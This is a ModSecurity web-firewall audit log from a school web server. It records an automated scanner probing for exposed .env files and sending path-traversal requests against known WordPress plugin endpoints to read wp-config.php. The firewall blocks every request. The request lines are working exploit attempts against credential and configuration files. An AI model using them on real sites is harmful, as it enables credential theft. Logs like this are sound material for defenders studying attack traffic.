Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b09c2c64-Z-- --f99e0112-A-- [23/Apr/2025:23:13:23 +0700] aAkRozI97BrbgvDq16RsSwAAAMU 103.236.140.4 38076 103.236.140.4 8181 --f99e0112-B-- GET /api_v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f99e0112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f99e0112-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424803136409 755 (- - -) Stopwatch2: 1745424803136409 755; combined=278, p1=244, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f99e0112-Z-- --7357b471-A-- [23/Apr/2025:23:13:23 +0700] aAkRoxuwXEWV6ydgl52X3AAAAA8 103.236.140.4 38088 103.236.140.4 8181 --7357b471-B-- GET /v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7357b471-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7357b471-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424803525294 837 (- - -) Stopwatch2: 1745424803525294 837; combined=299, p1=266, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7357b471-Z-- --4304d66a-A-- [23/Apr/2025:23:13:23 +0700] aAkRoxuwXEWV6ydgl52X4AAAAA4 103.236.140.4 38104 103.236.140.4 8181 --4304d66a-B-- GET /v1/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4304d66a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4304d66a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424803919223 826 (- - -) Stopwatch2: 1745424803919223 826; combined=298, p1=264, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4304d66a-Z-- --9fea5f00-A-- [23/Apr/2025:23:13:24 +0700] aAkRpNIw_rqnm4P5_afOJgAAAEo 103.236.140.4 38110 103.236.140.4 8181 --9fea5f00-B-- GET /admin/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9fea5f00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fea5f00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424804113723 879 (- - -) Stopwatch2: 1745424804113723 879; combined=319, p1=284, p2=0, p3=0, p4=0, p5=34, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fea5f00-Z-- --f1bfdd08-A-- [23/Apr/2025:23:13:24 +0700] aAkRpBuwXEWV6ydgl52X4gAAAAU 103.236.140.4 38112 103.236.140.4 8181 --f1bfdd08-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f1bfdd08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1bfdd08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424804307515 758 (- - -) Stopwatch2: 1745424804307515 758; combined=315, p1=285, p2=0, p3=0, p4=0, p5=30, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1bfdd08-Z-- --15f3dc67-A-- [23/Apr/2025:23:13:24 +0700] aAkRpNIw_rqnm4P5_afOJwAAAEg 103.236.140.4 38122 103.236.140.4 8181 --15f3dc67-B-- GET /ci4/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --15f3dc67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15f3dc67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424804500888 873 (- - -) Stopwatch2: 1745424804500888 873; combined=279, p1=240, p2=0, p3=0, p4=0, p5=39, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15f3dc67-Z-- --ad9c4b01-A-- [23/Apr/2025:23:13:24 +0700] aAkRpBuwXEWV6ydgl52X5gAAABY 103.236.140.4 38132 103.236.140.4 8181 --ad9c4b01-B-- GET /backup/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ad9c4b01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad9c4b01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424804694320 858 (- - -) Stopwatch2: 1745424804694320 858; combined=326, p1=294, p2=0, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad9c4b01-Z-- --dd64ae12-A-- [23/Apr/2025:23:13:24 +0700] aAkRpBuwXEWV6ydgl52X6AAAAAY 103.236.140.4 38138 103.236.140.4 8181 --dd64ae12-B-- GET /frontend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --dd64ae12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd64ae12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424804888935 837 (- - -) Stopwatch2: 1745424804888935 837; combined=315, p1=279, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd64ae12-Z-- --33d47417-A-- [23/Apr/2025:23:13:25 +0700] aAkRpRuwXEWV6ydgl52X6gAAAAk 103.236.140.4 38144 103.236.140.4 8181 --33d47417-B-- GET /old/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --33d47417-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33d47417-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424805083162 702 (- - -) Stopwatch2: 1745424805083162 702; combined=267, p1=238, p2=0, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33d47417-Z-- --6f92da5e-A-- [23/Apr/2025:23:13:25 +0700] aAkRpdIw_rqnm4P5_afOKQAAAFM 103.236.140.4 38150 103.236.140.4 8181 --6f92da5e-B-- GET /dev/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --6f92da5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f92da5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424805277054 824 (- - -) Stopwatch2: 1745424805277054 824; combined=327, p1=290, p2=0, p3=0, p4=0, p5=37, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f92da5e-Z-- --57afc463-A-- [23/Apr/2025:23:13:25 +0700] aAkRpRuwXEWV6ydgl52X7AAAAA8 103.236.140.4 38152 103.236.140.4 8181 --57afc463-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --57afc463-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57afc463-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424805470588 662 (- - -) Stopwatch2: 1745424805470588 662; combined=247, p1=221, p2=0, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57afc463-Z-- --9bdb715f-A-- [23/Apr/2025:23:13:25 +0700] aAkRpTI97BrbgvDq16RsTgAAAM0 103.236.140.4 38162 103.236.140.4 8181 --9bdb715f-B-- GET /public/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9bdb715f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bdb715f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424805663565 804 (- - -) Stopwatch2: 1745424805663565 804; combined=303, p1=263, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bdb715f-Z-- --746dc911-A-- [23/Apr/2025:23:13:31 +0700] aAkRqxuwXEWV6ydgl52YFQAAAAA 103.236.140.4 38310 103.236.140.4 8181 --746dc911-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --746dc911-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --746dc911-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424811172276 748 (- - -) Stopwatch2: 1745424811172276 748; combined=272, p1=240, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --746dc911-Z-- --7e3bc871-A-- [23/Apr/2025:23:13:31 +0700] aAkRq9Iw_rqnm4P5_afOMwAAAFQ 103.236.140.4 38316 103.236.140.4 8181 --7e3bc871-B-- GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7e3bc871-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e3bc871-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424811365703 869 (- - -) Stopwatch2: 1745424811365703 869; combined=290, p1=253, p2=0, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e3bc871-Z-- --47831a74-A-- [23/Apr/2025:23:13:31 +0700] aAkRqxuwXEWV6ydgl52YGAAAAAE 103.236.140.4 38322 103.236.140.4 8181 --47831a74-B-- GET /force-download.php?file=wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --47831a74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47831a74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424811562729 745 (- - -) Stopwatch2: 1745424811562729 745; combined=232, p1=206, p2=0, p3=0, p4=0, p5=26, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47831a74-Z-- --1e246344-A-- [23/Apr/2025:23:13:31 +0700] aAkRqz1ahuoJLEjKiAU06gAAAIA 103.236.140.4 38328 103.236.140.4 8181 --1e246344-B-- GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1e246344-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e246344-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424811757016 791 (- - -) Stopwatch2: 1745424811757016 791; combined=338, p1=307, p2=0, p3=0, p4=0, p5=31, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e246344-Z-- --1635d318-A-- [23/Apr/2025:23:13:31 +0700] aAkRqxuwXEWV6ydgl52YGwAAAAs 103.236.140.4 38334 103.236.140.4 8181 --1635d318-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1635d318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1635d318-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424811950841 791 (- - -) Stopwatch2: 1745424811950841 791; combined=297, p1=268, p2=0, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
